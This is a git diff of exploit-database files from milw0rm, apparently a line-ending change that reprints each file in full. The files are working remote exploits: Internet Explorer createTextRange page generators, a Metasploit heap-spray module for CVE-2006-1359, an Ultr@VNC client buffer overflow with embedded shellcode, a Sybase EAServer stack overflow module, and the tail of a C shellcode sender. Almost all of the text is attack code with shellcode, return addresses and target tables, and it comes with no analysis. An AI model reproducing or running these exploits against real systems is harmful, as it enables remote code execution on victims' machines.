FindSc+1,FindSc,sizeof FindSc-1); + + memcpy(szMagicData+251,szEnd,sizeof szEnd-1); + + char szAdog[]="AGOU"; + memcpy(szMagicData+253,szAdog,sizeof szAdog-1); + memcpy(szMagicData+257,szAdog,sizeof szAdog-1); + memcpy(szMagicData+261,shellcode,sizeof shellcode-1); + + memcpy(szMagicData+sizeof szMagicData-sizeof szEnd,szEnd,sizeof szEnd-1); + + printf("[+]Sending Magic Data To server...Good Luck!\n"); + send(s,szMagicData,sizeof szMagicData-1,0); + + recv(s,szRecvBuff,sizeof(szRecvBuff),0); + printf("%s\n",szRecvBuff); + + Disconnect(s); + printf("[?]Sending finished...Good luck!\n"); +} + +// milw0rm.com [2006-03-19] diff --git a/platforms/windows/remote/1606.html b/platforms/windows/remote/1606.html index e5afa90b5..47f05c2cc 100755 --- a/platforms/windows/remote/1606.html +++ b/platforms/windows/remote/1606.html @@ -1,86 +1,86 @@ - - - - - -# milw0rm.com [2006-03-23] + + + + + +# milw0rm.com [2006-03-23] diff --git a/platforms/windows/remote/1607.cpp b/platforms/windows/remote/1607.cpp index ba328191d..eb1d2714b 100755 --- a/platforms/windows/remote/1607.cpp +++ b/platforms/windows/remote/1607.cpp 
@@ -1,103 +1,103 @@ -/* -* -* Internet Explorer "createTextRang" Download Shellcoded Exploit -* Bug discovered by Computer Terrorism (UK) -* http://www.computerterrorism.com/research/ct22-03-2006 -* Reliable exploitation by Darkeagle of Unl0ck Research Team -* http://www.milw0rm.com/exploits/1606 -* -* Affected Software: Microsoft Internet Explorer 6.x & 7 Beta 2 -* Severity: Critical -* Impact: Remote System Access -* Solution Status: Unpatched -* -* E-Mail: atmaca@icqmail.com -* Web: http://www.spyinstructors.com,http://www.atmacasoft.com -* Credit to Kozan,Darkeagle,delikon,Stelian Ene -* -*/ - -#include -#include - -#define BUF_LEN 0x1518 -#define FILE_NAME "index.htm" - -char body1[] = - "\r\n" - "\r\n"; - - -int main(int argc,char *argv[]) -{ - if (argc < 2) - { - printf("\nInternet Explorer \"createTextRang\" Download Shellcoded Exploit"); - printf("\nUsage:\n"); - printf(" ie_exp \n"); - - return 0; - } - - FILE *File; - char *pszBuffer; - char *web = argv[1]; - char *pu = "%u"; - char u_t[5]; - char *utf16 = (char*)malloc(strlen(web)*5); - - if ( (File = fopen(FILE_NAME,"w+b")) == NULL ) { - printf("\n [Err:] fopen()"); - exit(1); - } - - pszBuffer = (char*)malloc(BUF_LEN); - memcpy(pszBuffer,body1,sizeof(body1)-1); - - memset(utf16,'\0',strlen(web)*5); - for (unsigned int i=0;i +#include + +#define BUF_LEN 0x1518 +#define FILE_NAME "index.htm" + +char body1[] = + "\r\n" + "\r\n"; + + +int main(int argc,char *argv[]) +{ + if (argc < 2) + { + printf("\nInternet Explorer \"createTextRang\" Download Shellcoded Exploit"); + printf("\nUsage:\n"); + printf(" ie_exp \n"); + + return 0; + } + + FILE *File; + char *pszBuffer; + char *web = argv[1]; + char *pu = "%u"; + char u_t[5]; + char *utf16 = (char*)malloc(strlen(web)*5); + + if ( (File = fopen(FILE_NAME,"w+b")) == NULL ) { + printf("\n [Err:] fopen()"); + exit(1); + } + + pszBuffer = (char*)malloc(BUF_LEN); + memcpy(pszBuffer,body1,sizeof(body1)-1); + + memset(utf16,'\0',strlen(web)*5); + for (unsigned int 
i=0;i [1, 'Enable gzip content encoding'], - 'Chunked' => [1, 'Enable chunked transfer encoding'], - }; - -my $info = - { - 'Name' => 'Internet Explorer createTextRange() Code Execution', - 'Version' => '$Revision: 1.4 $', - 'Authors' => - [ - 'Faithless ', - 'Darkeagle ', - 'H D Moore ', - '', - 'Anonymous', - ], - - 'Description' => - Pex::Text::Freeform(qq{ - This module exploits a code execution vulnerability in Microsoft Internet Explorer. - Both IE6 and IE7 (Beta 2) are vulnerable. It will corrupt memory in a way, which, under - certain circumstances, can lead to an invalid/corrupt table pointer dereference. EIP will point - to a very remote, non-existent memory location. This module is the result of merging three - different exploit submissions and has only been reliably tested against Windows XP SP2. - This vulnerability was independently discovered by multiple parties. The heap spray method - used by this exploit was pioneered by Skylined. -}), - - 'Arch' => [ 'x86' ], - 'OS' => [ 'win32', 'winxp', 'win2003' ], - 'Priv' => 0, - - 'UserOpts' => - { - 'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080 ], - 'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ], - }, - - 'Payload' => - { - 'Space' => 1024, - 'BadChars' => "\x00", - 'Keys' => ['-bind'], - }, - 'Refs' => - [ - ['OSVDB', '24050'], - ['BID', '17196'], - ['CVE', '2006-1359'], - ['URL', 'http://secunia.com/secunia_research/2006-7/advisory/'], - ['URL', 'http://seclists.org/lists/bugtraq/2006/Mar/0410.html'], - ['URL', 'http://www.kb.cert.org/vuls/id/876678'], - ['URL', 'http://seclists.org/lists/fulldisclosure/2006/Mar/1439.html'], - ['URL', 'http://www.shog9.com/crashIE.html'], - ], - - 'DefaultTarget' => 0, - 'Targets' => - [ - [ 'Internet Explorer 7 - (7.0.5229.0) -> 3C0474C2 (Windows XP SP2)' ], - [ 'Internet Explorer 6 - (6.0.3790.0) -> 746F9468 (Windows XP SP2)' ], - ], - - 'Keys' => [ 'ie' ], - - 'DisclosureDate' => 'Mar 19 2006', - }; - -sub new { - my $class = 
shift; - my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); - return($self); -} - -sub Exploit -{ - my $self = shift; - - if (! $self->InitNops(128)) { - $self->PrintLine("[*] Failed to initialize the NOP module."); - return; - } - - my $server = IO::Socket::INET->new( - LocalHost => $self->GetVar('HTTPHOST'), - LocalPort => $self->GetVar('HTTPPORT'), - ReuseAddr => 1, - Listen => 1, - Proto => 'tcp' - ); - my $client; - - # Did the listener create fail? - if (not defined($server)) { - $self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT')); - return; - } - - my $httphost = ($self->GetVar('HTTPHOST') eq '0.0.0.0') ? - Pex::Utils::SourceIP('1.2.3.4') : - $self->GetVar('HTTPHOST'); - - $self->PrintLine("[*] Waiting for connections to http://". $httphost .":". $self->GetVar('HTTPPORT') ."/"); - - while (defined($client = $server->accept())) { - $self->HandleHttpClient(Msf::Socket::Tcp->new_from_socket($client)); - } - - return; -} - -sub HandleHttpClient -{ - my $self = shift; - my $fd = shift; - - # Set the remote host information - my ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr); - - # Read the HTTP command - my ($cmd, $url, $proto) = split(/ /, $fd->RecvLine(10), 3); - my $agent; - - # Read in the HTTP headers - while ((my $line = $fd->RecvLine(10))) { - - $line =~ s/^\s+|\s+$//g; - - my ($var, $val) = split(/\:/, $line, 2); - - # Break out if we reach the end of the headers - last if (not defined($var) or not defined($val)); - - $agent = $val if $var =~ /User-Agent/i; - } - - my $os = 'Unknown'; - - $os = 'Linux' if $agent =~ /Linux/i; - $os = 'Mac OS X' if $agent =~ /OS X/i; - $os = 'Windows' if $agent =~ /Windows/i; - - $self->PrintLine("[*] Client connected from $rhost:$rport ($os)."); - - my $res = $fd->Send($self->BuildResponse($self->GenerateHTML())); - - $fd->Close(); -} - -sub JSUnescape { - my $self = shift; - my $data = shift; - my $code = ''; - - # Encode the shellcode via %u 
sequences for JS's unescape() function - my $idx = 0; - while ($idx < length($data) - 1) { - my $c1 = ord(substr($data, $idx, 1)); - my $c2 = ord(substr($data, $idx+1, 1)); - $code .= sprintf('%%u%.2x%.2x', $c2, $c1); - $idx += 2; - } - - return $code; -} - -sub GenerateHTML { - my $self = shift; - my $target = $self->Targets->[$self->GetVar('TARGET')]; - - my $shellcode = $self->JSUnescape($self->GetVar('EncodedPayload')->Payload); - my $nops = $self->JSUnescape($self->MakeNops(4)); - my $rnd = int(rand(3)); - my $inputtype = (($rnd == 0) ? "checkbox" : (($rnd == 1) ? "radio" : "image")); - my $inp = "_".Pex::Text::AlphaNumText(int(rand(6)+3)); - my $tmp = "_".Pex::Text::AlphaNumText(int(rand(6)+3)); - my $payload = "_".Pex::Text::AlphaNumText(int(rand(6)+3)); - my $nopslide = "_".Pex::Text::AlphaNumText(int(rand(6)+3)); - my $slidesize = "_".Pex::Text::AlphaNumText(int(rand(6)+3)); - my $fillblock = "_".Pex::Text::AlphaNumText(int(rand(6)+3)); - my $memblock = "_".Pex::Text::AlphaNumText(int(rand(6)+3)); - my $heap = "_".Pex::Text::AlphaNumText(int(rand(6)+3)); - my $index = "_".Pex::Text::AlphaNumText(int(rand(6)+3)); - my $maxIndex = "_".Pex::Text::AlphaNumText(int(rand(6)+3)); - my $fillHeap = "_".Pex::Text::AlphaNumText(int(rand(6)+3)); - my $start = "_".Pex::Text::AlphaNumText(int(rand(6)+3)); - my $timer = "_".Pex::Text::AlphaNumText(int(rand(6)+3)); - $rnd = int(rand(2)); - my $setTimeout =($rnd == 0) ? "setTimeout('$fillHeap()', 5);" : ""; - my $setInterval =($rnd == 1) ? "setInterval('$fillHeap()', 5);" : ""; - - my $data = qq# - - - - - -Sit back and relax as your windows box is being exploited using a non CPU consuming heap spraying exploit.
    -In the meantime, you can open your task manager and watch how the VM size of IEXPLORE.EXE grows, while the CPU time of this process is very low.
    -Progress: % - - -#; -} - -sub BuildResponse { - my ($self, $content) = @_; - - my $response = - "HTTP/1.1 200 OK\r\n" . - "Content-Type: text/html\r\n"; - - if ($self->GetVar('Gzip')) { - $response .= "Content-Encoding: gzip\r\n"; - $content = $self->Gzip($content); - } - if ($self->GetVar('Chunked')) { - $response .= "Transfer-Encoding: chunked\r\n"; - $content = $self->Chunk($content); - } else { - $response .= 'Content-Length: ' . length($content) . "\r\n" . - "Connection: close\r\n"; - } - - $response .= "\r\n" . $content; - - return $response; -} - -sub Chunk { - my ($self, $content) = @_; - - my $chunked; - while (length($content)) { - my $chunk = substr($content, 0, int(rand(10) + 1), ''); - $chunked .= sprintf('%x', length($chunk)) . "\r\n$chunk\r\n"; - } - $chunked .= "0\r\n\r\n"; - - return $chunked; -} - -sub Gzip { - my $self = shift; - my $data = shift; - my $comp = int(rand(5))+5; - - my($wtr, $rdr, $err); - - my $pid = open3($wtr, $rdr, $err, 'gzip', '-'.$comp, '-c', '--force'); - print $wtr $data; - close ($wtr); - local $/; - - return (<$rdr>); -} -1; - -# milw0rm.com [2006-04-01] +## +# This file is part of the Metasploit Framework and may be redistributed +# according to the licenses defined in the Authors field below. In the +# case of an unknown or missing license, this file defaults to the same +# license as the core Framework (dual GPLv2 and Artistic). The latest +# version of the Framework can always be obtained from metasploit.com. 
+## + +package Msf::Exploit::ie_createtextrange; + +use strict; +use base "Msf::Exploit"; +use Pex::Text; +use IO::Socket::INET; +use IPC::Open3; + +my $advanced = + { + 'Gzip' => [1, 'Enable gzip content encoding'], + 'Chunked' => [1, 'Enable chunked transfer encoding'], + }; + +my $info = + { + 'Name' => 'Internet Explorer createTextRange() Code Execution', + 'Version' => '$Revision: 1.4 $', + 'Authors' => + [ + 'Faithless ', + 'Darkeagle ', + 'H D Moore ', + '', + 'Anonymous', + ], + + 'Description' => + Pex::Text::Freeform(qq{ + This module exploits a code execution vulnerability in Microsoft Internet Explorer. + Both IE6 and IE7 (Beta 2) are vulnerable. It will corrupt memory in a way, which, under + certain circumstances, can lead to an invalid/corrupt table pointer dereference. EIP will point + to a very remote, non-existent memory location. This module is the result of merging three + different exploit submissions and has only been reliably tested against Windows XP SP2. + This vulnerability was independently discovered by multiple parties. The heap spray method + used by this exploit was pioneered by Skylined. 
+}), + + 'Arch' => [ 'x86' ], + 'OS' => [ 'win32', 'winxp', 'win2003' ], + 'Priv' => 0, + + 'UserOpts' => + { + 'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080 ], + 'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ], + }, + + 'Payload' => + { + 'Space' => 1024, + 'BadChars' => "\x00", + 'Keys' => ['-bind'], + }, + 'Refs' => + [ + ['OSVDB', '24050'], + ['BID', '17196'], + ['CVE', '2006-1359'], + ['URL', 'http://secunia.com/secunia_research/2006-7/advisory/'], + ['URL', 'http://seclists.org/lists/bugtraq/2006/Mar/0410.html'], + ['URL', 'http://www.kb.cert.org/vuls/id/876678'], + ['URL', 'http://seclists.org/lists/fulldisclosure/2006/Mar/1439.html'], + ['URL', 'http://www.shog9.com/crashIE.html'], + ], + + 'DefaultTarget' => 0, + 'Targets' => + [ + [ 'Internet Explorer 7 - (7.0.5229.0) -> 3C0474C2 (Windows XP SP2)' ], + [ 'Internet Explorer 6 - (6.0.3790.0) -> 746F9468 (Windows XP SP2)' ], + ], + + 'Keys' => [ 'ie' ], + + 'DisclosureDate' => 'Mar 19 2006', + }; + +sub new { + my $class = shift; + my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); + return($self); +} + +sub Exploit +{ + my $self = shift; + + if (! $self->InitNops(128)) { + $self->PrintLine("[*] Failed to initialize the NOP module."); + return; + } + + my $server = IO::Socket::INET->new( + LocalHost => $self->GetVar('HTTPHOST'), + LocalPort => $self->GetVar('HTTPPORT'), + ReuseAddr => 1, + Listen => 1, + Proto => 'tcp' + ); + my $client; + + # Did the listener create fail? + if (not defined($server)) { + $self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT')); + return; + } + + my $httphost = ($self->GetVar('HTTPHOST') eq '0.0.0.0') ? + Pex::Utils::SourceIP('1.2.3.4') : + $self->GetVar('HTTPHOST'); + + $self->PrintLine("[*] Waiting for connections to http://". $httphost .":". 
$self->GetVar('HTTPPORT') ."/"); + + while (defined($client = $server->accept())) { + $self->HandleHttpClient(Msf::Socket::Tcp->new_from_socket($client)); + } + + return; +} + +sub HandleHttpClient +{ + my $self = shift; + my $fd = shift; + + # Set the remote host information + my ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr); + + # Read the HTTP command + my ($cmd, $url, $proto) = split(/ /, $fd->RecvLine(10), 3); + my $agent; + + # Read in the HTTP headers + while ((my $line = $fd->RecvLine(10))) { + + $line =~ s/^\s+|\s+$//g; + + my ($var, $val) = split(/\:/, $line, 2); + + # Break out if we reach the end of the headers + last if (not defined($var) or not defined($val)); + + $agent = $val if $var =~ /User-Agent/i; + } + + my $os = 'Unknown'; + + $os = 'Linux' if $agent =~ /Linux/i; + $os = 'Mac OS X' if $agent =~ /OS X/i; + $os = 'Windows' if $agent =~ /Windows/i; + + $self->PrintLine("[*] Client connected from $rhost:$rport ($os)."); + + my $res = $fd->Send($self->BuildResponse($self->GenerateHTML())); + + $fd->Close(); +} + +sub JSUnescape { + my $self = shift; + my $data = shift; + my $code = ''; + + # Encode the shellcode via %u sequences for JS's unescape() function + my $idx = 0; + while ($idx < length($data) - 1) { + my $c1 = ord(substr($data, $idx, 1)); + my $c2 = ord(substr($data, $idx+1, 1)); + $code .= sprintf('%%u%.2x%.2x', $c2, $c1); + $idx += 2; + } + + return $code; +} + +sub GenerateHTML { + my $self = shift; + my $target = $self->Targets->[$self->GetVar('TARGET')]; + + my $shellcode = $self->JSUnescape($self->GetVar('EncodedPayload')->Payload); + my $nops = $self->JSUnescape($self->MakeNops(4)); + my $rnd = int(rand(3)); + my $inputtype = (($rnd == 0) ? "checkbox" : (($rnd == 1) ? 
"radio" : "image")); + my $inp = "_".Pex::Text::AlphaNumText(int(rand(6)+3)); + my $tmp = "_".Pex::Text::AlphaNumText(int(rand(6)+3)); + my $payload = "_".Pex::Text::AlphaNumText(int(rand(6)+3)); + my $nopslide = "_".Pex::Text::AlphaNumText(int(rand(6)+3)); + my $slidesize = "_".Pex::Text::AlphaNumText(int(rand(6)+3)); + my $fillblock = "_".Pex::Text::AlphaNumText(int(rand(6)+3)); + my $memblock = "_".Pex::Text::AlphaNumText(int(rand(6)+3)); + my $heap = "_".Pex::Text::AlphaNumText(int(rand(6)+3)); + my $index = "_".Pex::Text::AlphaNumText(int(rand(6)+3)); + my $maxIndex = "_".Pex::Text::AlphaNumText(int(rand(6)+3)); + my $fillHeap = "_".Pex::Text::AlphaNumText(int(rand(6)+3)); + my $start = "_".Pex::Text::AlphaNumText(int(rand(6)+3)); + my $timer = "_".Pex::Text::AlphaNumText(int(rand(6)+3)); + $rnd = int(rand(2)); + my $setTimeout =($rnd == 0) ? "setTimeout('$fillHeap()', 5);" : ""; + my $setInterval =($rnd == 1) ? "setInterval('$fillHeap()', 5);" : ""; + + my $data = qq# + + + + + +Sit back and relax as your windows box is being exploited using a non CPU consuming heap spraying exploit.
    +In the meantime, you can open your task manager and watch how the VM size of IEXPLORE.EXE grows, while the CPU time of this process is very low.
    +Progress: % + + +#; +} + +sub BuildResponse { + my ($self, $content) = @_; + + my $response = + "HTTP/1.1 200 OK\r\n" . + "Content-Type: text/html\r\n"; + + if ($self->GetVar('Gzip')) { + $response .= "Content-Encoding: gzip\r\n"; + $content = $self->Gzip($content); + } + if ($self->GetVar('Chunked')) { + $response .= "Transfer-Encoding: chunked\r\n"; + $content = $self->Chunk($content); + } else { + $response .= 'Content-Length: ' . length($content) . "\r\n" . + "Connection: close\r\n"; + } + + $response .= "\r\n" . $content; + + return $response; +} + +sub Chunk { + my ($self, $content) = @_; + + my $chunked; + while (length($content)) { + my $chunk = substr($content, 0, int(rand(10) + 1), ''); + $chunked .= sprintf('%x', length($chunk)) . "\r\n$chunk\r\n"; + } + $chunked .= "0\r\n\r\n"; + + return $chunked; +} + +sub Gzip { + my $self = shift; + my $data = shift; + my $comp = int(rand(5))+5; + + my($wtr, $rdr, $err); + + my $pid = open3($wtr, $rdr, $err, 'gzip', '-'.$comp, '-c', '--force'); + print $wtr $data; + close ($wtr); + local $/; + + return (<$rdr>); +} +1; + +# milw0rm.com [2006-04-01] diff --git a/platforms/windows/remote/1628.cpp b/platforms/windows/remote/1628.cpp index 1ec65c002..47e49ae17 100755 --- a/platforms/windows/remote/1628.cpp +++ b/platforms/windows/remote/1628.cpp 
@@ -1,114 +1,114 @@ -/* -* -* Internet Explorer "createTextRang" Download Shellcoded Exploit (2) -* Bug discovered by Computer Terrorism (UK) -* http://www.computerterrorism.com/research/ct22-03-2006 -* -* Affected Software: Microsoft Internet Explorer 6.x & 7 Beta 2 -* Severity: Critical -* Impact: Remote System Access -* Solution Status: Unpatched -* -* E-Mail: atmaca@icqmail.com -* Web: http://www.spyinstructors.com,http://www.atmacasoft.com -* Credit to Kozan,SkyLined,delikon,Darkeagle,Stelian Ene -* -*/ - -/* -* -* This one is more faster than all released createTextRange exploits -* because it uses last version of SkyLined's heap spraying code, -* special 10x goes to him. -* -*/ - -#include -#include - -#define BUF_LEN 0x800 -#define FILE_NAME "index.htm" - -char body1[] = - "\r\n" - ""; - - -int main(int argc,char *argv[]) -{ - if (argc < 2) - { - printf("\nInternet Explorer \"createTextRang\" Download Shellcoded Exploit (2)"); - printf("\nCoded by ATmaCA (atmaca[at]icqmail.com)\n"); - printf("\nUsage:\n"); - printf("ie_exp \n"); - - return 0; - } - - FILE *File; - char *pszBuffer; - char *web = argv[1]; - char *pu = "%u"; - char u_t[5]; - char *utf16 = (char*)malloc(strlen(web)*5); - - if ( (File = fopen(FILE_NAME,"w+b")) == NULL ) { - printf("\n [Err:] fopen()"); - exit(1); - } - - pszBuffer = (char*)malloc(BUF_LEN); - memcpy(pszBuffer,body1,sizeof(body1)-1); - - memset(utf16,'\0',strlen(web)*5); - for (unsigned int i=0;i +#include + +#define BUF_LEN 0x800 +#define FILE_NAME "index.htm" + +char body1[] = + "\r\n" + ""; + + +int main(int argc,char *argv[]) +{ + if (argc < 2) + { + printf("\nInternet Explorer \"createTextRang\" Download Shellcoded Exploit (2)"); + printf("\nCoded by ATmaCA (atmaca[at]icqmail.com)\n"); + printf("\nUsage:\n"); + printf("ie_exp \n"); + + return 0; + } + + FILE *File; + char *pszBuffer; + char *web = argv[1]; + char *pu = "%u"; + char u_t[5]; + char *utf16 = (char*)malloc(strlen(web)*5); + + if ( (File = fopen(FILE_NAME,"w+b")) 
== NULL ) { + printf("\n [Err:] fopen()"); + exit(1); + } + + pszBuffer = (char*)malloc(BUF_LEN); + memcpy(pszBuffer,body1,sizeof(body1)-1); + + memset(utf16,'\0',strlen(web)*5); + for (unsigned int i=0;i; select(STDOUT); close(S); return @in; - } else { die("[-] Can't connect...\n"); }} - -# milw0rm.com [2004-03-26] + } else { die("[-] Can't connect...\n"); }} + +# milw0rm.com [2004-03-26] diff --git a/platforms/windows/remote/1664.py b/platforms/windows/remote/1664.py index 31cef41b1..8ae997e06 100755 --- a/platforms/windows/remote/1664.py +++ b/platforms/windows/remote/1664.py 
@@ -1,57 +1,57 @@
-#!/usr/bin/python
-
-#Ultr@VNC 1.0.1 Client Buffer Overflow - Luigi Auriemm
-#POC by Paul Haas at Redspin.com
-#Tested on WinXP SP 2: Launches Calc
-import socket, struct
-
-HOST = '' # Localhost
-PORT = 5900 # VNC Server
-BOFSZ = 1024 # Buffer Size
-HEAD = "RFB 003.006\n" # VNC Header
-MESSAGE = "Requires Ultr@VNC Authentication\n"
-NOP = "\x90" # Standard x86 NOP
-JMP = "\xE9\x1B\xFC\xFF\xFF" # JMP To BUFF
-ESP = "\xE0\x3A\xB4\x76" # winmm.dll: JMP %esp
-POP = "PASSWORD" # RET 8
-
-# win32_exec - CMD=calc Size=160 http://metasploit.com
-SHELLCODE = \
-"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe1"+\
-"\x7c\x05\xd9\x83\xeb\xfc\xe2\xf4\x1d\x94\x41\xd9\xe1\x7c\x8e\x9c"+\
-"\xdd\xf7\x79\xdc\x99\x7d\xea\x52\xae\x64\x8e\x86\xc1\x7d\xee\x90"+\
-"\x6a\x48\x8e\xd8\x0f\x4d\xc5\x40\x4d\xf8\xc5\xad\xe6\xbd\xcf\xd4"+\
-"\xe0\xbe\xee\x2d\xda\x28\x21\xdd\x94\x99\x8e\x86\xc5\x7d\xee\xbf"+\
-"\x6a\x70\x4e\x52\xbe\x60\x04\x32\x6a\x60\x8e\xd8\x0a\xf5\x59\xfd"+\
-"\xe5\xbf\x34\x19\x85\xf7\x45\xe9\x64\xbc\x7d\xd5\x6a\x3c\x09\x52"+\
-"\x91\x60\xa8\x52\x89\x74\xee\xd0\x6a\xfc\xb5\xd9\xe1\x7c\x8e\xb1"+\
-"\xdd\x23\x34\x2f\x81\x2a\x8c\x21\x62\xbc\x7e\x89\x89\x8c\x8f\xdd"+\
-"\xbe\x14\x9d\x27\x6b\x72\x52\x26\x06\x1f\x64\xb5\x82\x7c\x05\xd9"
-
-#buff = MESSAGE+SHELLCODE+NOP SLED+RET ADDR+USELESS+JUMP TO BUFF
-buff = MESSAGE+SHELLCODE+NOP*(BOFSZ-11-len(MESSAGE)-len(SHELLCODE))
-buff = buff+ESP+POP+JMP
-
-#Egg = VNC Server Error Reply and Size of Reply + buff
-egg = struct.pack('LL',socket.htonl(0),socket.htonl(len(buff)))+buff
-
-print 'Ultr@VNC 1.0.1 Client Buffer Overflow - Luigi Auriemma'
-print 'POC by Paul Haas at Redspin.com'
-print 'Server listening on port', PORT
-
-#Server Loop
-while(1):
- s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- s.bind((HOST, PORT))
- s.listen(1)
-
- conn, addr = s.accept()
- print 'Connection by', addr
-
- conn.send(HEAD)
- data = conn.recv(12)
-
- conn.send(egg)
- conn.close()
-
-# milw0rm.com [2006-04-11]
+#!/usr/bin/python
+
+#Ultr@VNC 1.0.1 Client Buffer Overflow - Luigi Auriemm
+#POC by Paul Haas at Redspin.com
+#Tested on WinXP SP 2: Launches Calc
+import socket, struct
+
+HOST = '' # Localhost
+PORT = 5900 # VNC Server
+BOFSZ = 1024 # Buffer Size
+HEAD = "RFB 003.006\n" # VNC Header
+MESSAGE = "Requires Ultr@VNC Authentication\n"
+NOP = "\x90" # Standard x86 NOP
+JMP = "\xE9\x1B\xFC\xFF\xFF" # JMP To BUFF
+ESP = "\xE0\x3A\xB4\x76" # winmm.dll: JMP %esp
+POP = "PASSWORD" # RET 8
+
+# win32_exec - CMD=calc Size=160 http://metasploit.com
+SHELLCODE = \
+"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe1"+\
+"\x7c\x05\xd9\x83\xeb\xfc\xe2\xf4\x1d\x94\x41\xd9\xe1\x7c\x8e\x9c"+\
+"\xdd\xf7\x79\xdc\x99\x7d\xea\x52\xae\x64\x8e\x86\xc1\x7d\xee\x90"+\
+"\x6a\x48\x8e\xd8\x0f\x4d\xc5\x40\x4d\xf8\xc5\xad\xe6\xbd\xcf\xd4"+\
+"\xe0\xbe\xee\x2d\xda\x28\x21\xdd\x94\x99\x8e\x86\xc5\x7d\xee\xbf"+\
+"\x6a\x70\x4e\x52\xbe\x60\x04\x32\x6a\x60\x8e\xd8\x0a\xf5\x59\xfd"+\
+"\xe5\xbf\x34\x19\x85\xf7\x45\xe9\x64\xbc\x7d\xd5\x6a\x3c\x09\x52"+\
+"\x91\x60\xa8\x52\x89\x74\xee\xd0\x6a\xfc\xb5\xd9\xe1\x7c\x8e\xb1"+\
+"\xdd\x23\x34\x2f\x81\x2a\x8c\x21\x62\xbc\x7e\x89\x89\x8c\x8f\xdd"+\
+"\xbe\x14\x9d\x27\x6b\x72\x52\x26\x06\x1f\x64\xb5\x82\x7c\x05\xd9"
+
+#buff = MESSAGE+SHELLCODE+NOP SLED+RET ADDR+USELESS+JUMP TO BUFF
+buff = MESSAGE+SHELLCODE+NOP*(BOFSZ-11-len(MESSAGE)-len(SHELLCODE))
+buff = buff+ESP+POP+JMP
+
+#Egg = VNC Server Error Reply and Size of Reply + buff
+egg = struct.pack('LL',socket.htonl(0),socket.htonl(len(buff)))+buff
+
+print 'Ultr@VNC 1.0.1 Client Buffer Overflow - Luigi Auriemma'
+print 'POC by Paul Haas at Redspin.com'
+print 'Server listening on port', PORT
+
+#Server Loop
+while(1):
+ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ s.bind((HOST, PORT))
+ s.listen(1)
+
+ conn, addr = s.accept()
+ print 'Connection by', addr
+
+ conn.send(HEAD)
+ data = conn.recv(12)
+
+ conn.send(egg)
+ conn.close()
+
+# milw0rm.com [2006-04-11]
diff --git a/platforms/windows/remote/168.c b/platforms/windows/remote/168.c
index 7be51bcd5..81b6ae45a 100755
--- a/platforms/windows/remote/168.c
+++ b/platforms/windows/remote/168.c
@@ -292,6 +292,6 @@
 fprintf (stderr, "# done.\n");
 fprintf (stderr, "# make sure we are in, dude :)\n\n");
 return 0;
-}
-
-// milw0rm.com [2004-03-28]
+}
+
+// milw0rm.com [2004-03-28]
diff --git a/platforms/windows/remote/1681.pm b/platforms/windows/remote/1681.pm
index f82f549f1..39d52446f 100755
--- a/platforms/windows/remote/1681.pm
+++ b/platforms/windows/remote/1681.pm
@@ -1,127 +1,127 @@ -## -# This file is part of the Metasploit Framework and may be redistributed -# according to the licenses defined in the Authors field below. In the -# case of an unknown or missing license, this file defaults to the same -# license as the core Framework (dual GPLv2 and Artistic). The latest -# version of the Framework can always be obtained from metasploit.com. -## - -package Msf::Exploit::sybase_easerver; -use strict; -use base "Msf::Exploit"; -use Pex::Text; - -my $advanced = { }; - -my $info = - { - 'Name' => 'Sybase EAServer 5.2 Remote Stack Overflow', - 'Version' => '$Revision: 1.4 $', - 'Authors' => [ 'anonymous' ], - 'Arch' => [ 'x86' ], - 'OS' => [ 'win32', 'winxp', 'win2k', 'win2003' ], - 'Priv' => 1, - - 'AutoOpts' => - { - 'EXITFUNC' => 'thread' - }, - - 'UserOpts' => - { - 'RHOST' => [1, 'ADDR', 'The target address'], - 'RPORT' => [1, 'PORT', 'The target port', 8080 ], - 'VHOST' => [0, 'DATA', 'The virtual host name of the server'], - 'DIR' => [1, 'DATA', 'Directory of Login.jsp script', '/WebConsole/'], - 'SSL' => [0, 'BOOL', 'Use SSL'], - }, - - 'Payload' => - { - 'Space' => 1000, - 'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&=+?:;-,/#.\\\$\%", - 'Prepend' => "\x81\xc4\x1f\xff\xff\xff\x44", # make stack happy - 'Keys' => ['+ws2ord'], - }, - - 'Description' => Pex::Text::Freeform(qq{ - This module exploits a stack overflow in the Sybase EAServer Web - Console. The offset to the SEH frame appears to change depending - on what version of Java is in use by the remote server, making this - exploit somewhat unreliable. -}), - - 'Refs' => - [ - ['BID', 14287], - ], - - 'Targets' => - [ - # Technically we could combine these into a single multi-return string... 
- [ 'Windows All - Sybase EAServer 5.2 - jdk 1.3.1_11', 0x6d4548ff, 3820], - [ 'Windows All - Sybase EAServer 5.2 - jdk 1.3.?.?', 0x6d4548ff, 3841], - [ 'Windows All - Sybase EAServer 5.2 - jdk 1.4.2_06', 0x08041b25, 3912], - [ 'Windows All - Sybase EAServer 5.2 - jdk 1.4.1_02', 0x08041b25, 3925], - ], - - 'Keys' => ['easerver'], - }; - -sub new { - my $class = shift; - my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); - return($self); -} - -sub Exploit { - my $self = shift; - my $target_host = $self->GetVar('RHOST'); - my $target_port = $self->GetVar('RPORT'); - my $target_idx = $self->GetVar('TARGET'); - my $shellcode = $self->GetVar('EncodedPayload')->Payload; - my $dir = $self->GetVar('DIR'); - my $target = $self->Targets->[$target_idx]; - - $self->PrintLine( "[*] Attempting to exploit " . $target->[0] ); - - my $s = Msf::Socket::Tcp->new( - 'PeerAddr' => $target_host, - 'PeerPort' => $target_port, - 'SSL' => $self->GetVar('SSL'), - ); - - if ( $s->IsError ) { - $self->PrintLine( '[*] Error creating socket: ' . 